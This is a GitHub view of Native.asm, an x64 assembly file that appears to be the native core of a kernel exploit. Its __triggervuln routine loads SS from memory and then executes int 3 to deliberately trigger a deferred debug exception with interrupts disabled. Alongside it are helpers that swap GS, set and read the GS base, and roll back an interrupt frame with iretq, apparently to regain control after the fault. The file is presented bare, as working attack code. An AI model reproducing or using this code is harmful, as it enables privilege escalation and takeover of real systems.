-
Notifications
You must be signed in to change notification settings - Fork 112
/
Native.asm
146 lines (122 loc) · 2.16 KB
/
Native.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
.code
__swapgs PROC
swapgs
ret
__swapgs ENDP
__rollback_isr PROC
mov rdx, [rsp] ; rdx = Return pointer
lea r8, [rsp+8h] ; r8 = Old stack
mov [rcx], rdx ; isr stack.rip = Return pointer
mov [rcx+18h], r8 ; isr stack.rsp = Old stack
mov rsp, rcx ; stack = isr stack
iretq ; return
__rollback_isr ENDP
__set_gs_base PROC
wrgsbase rcx
ret
__set_gs_base ENDP
__readss PROC
xor eax, eax
mov ax, ss
ret
__readss ENDP
__read_gs_base PROC
rdgsbase rax
ret
__read_gs_base ENDP
__triggervuln PROC
mov [rcx+8*0], r12 ; save registers
mov [rcx+8*1], r13
mov [rcx+8*2], r14
mov [rcx+8*3], r15
mov [rcx+8*4], rdi
mov [rcx+8*5], rsi
mov [rcx+8*6], rbx
mov [rcx+8*7], rbp
mov [rcx+8*8], rsp
pushfq
pop [rcx+8*9]
mov ss, word ptr [rdx] ; Defer debug exception
int 3 ; Execute with interrupts disabled
nop
nop
nop
nop
mov r12, [rcx+8*0] ; load registers
mov r13, [rcx+8*1]
mov r14, [rcx+8*2]
mov r15, [rcx+8*3]
mov rdi, [rcx+8*4]
mov rsi, [rcx+8*5]
mov rbx, [rcx+8*6]
mov rbp, [rcx+8*7]
mov rsp, [rcx+8*8]
push [rcx+8*9]
popfq
ret
__triggervuln ENDP
__setxmm0 PROC
movups xmm0, [rcx]
ret
__setxmm0 ENDP
__setxmm1 PROC
movups xmm1, [rcx]
ret
__setxmm1 ENDP
__setxmm2 PROC
movups xmm2, [rcx]
ret
__setxmm2 ENDP
__setxmm3 PROC
movups xmm3, [rcx]
ret
__setxmm3 ENDP
__setxmm4 PROC
movups xmm4, [rcx]
ret
__setxmm4 ENDP
__setxmm5 PROC
movups xmm5, [rcx]
ret
__setxmm5 ENDP
__setxmm6 PROC
movups xmm6, [rcx]
ret
__setxmm6 ENDP
__setxmm7 PROC
movups xmm7, [rcx]
ret
__setxmm7 ENDP
__setxmm8 PROC
movups xmm8, [rcx]
ret
__setxmm8 ENDP
__setxmm9 PROC
movups xmm9, [rcx]
ret
__setxmm9 ENDP
__setxmm10 PROC
movups xmm10, [rcx]
ret
__setxmm10 ENDP
__setxmm11 PROC
movups xmm11, [rcx]
ret
__setxmm11 ENDP
__setxmm12 PROC
movups xmm12, [rcx]
ret
__setxmm12 ENDP
__setxmm13 PROC
movups xmm13, [rcx]
ret
__setxmm13 ENDP
__setxmm14 PROC
movups xmm14, [rcx]
ret
__setxmm14 ENDP
__setxmm15 PROC
movups xmm15, [rcx]
ret
__setxmm15 ENDP
end